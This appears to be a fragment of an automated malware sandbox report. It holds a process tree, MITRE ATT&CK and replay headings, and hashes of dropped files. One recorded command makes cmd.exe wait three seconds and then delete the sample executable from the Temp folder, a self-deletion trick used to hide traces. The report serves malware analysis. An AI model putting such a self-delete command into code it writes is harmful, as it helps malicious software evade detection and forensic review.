C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe2⤵PID:4756
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵PID:3768
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=es --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4128,i,394370223929890652,966505792817799439,262144 --variations-seed-version --mojo-platform-channel-handle=1304 /prefetch:81⤵PID:5624
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
219KB
MD5b1dfb4f9eb3e598d1892a3bd3a92f079
SHA10fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA51298454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2
-
Filesize
1KB
MD5eee648049163f181aca9e7c44fc5dd1d
SHA1a3d6862a1f88283b0d5f84e53d422536ee087d55
SHA256e7bc96ec509cf244b36c52c964105e6aaa745d4a6fc17a6b84faad38f25bdd7e
SHA512797d20c9ddeec3dd9273060b27ba4a75698fb608a2f0800ad930ffcb5a7aa9991520f6f2d37aab4d52e93a5022920572bc8e7990ffd6d99969e40a6afb853918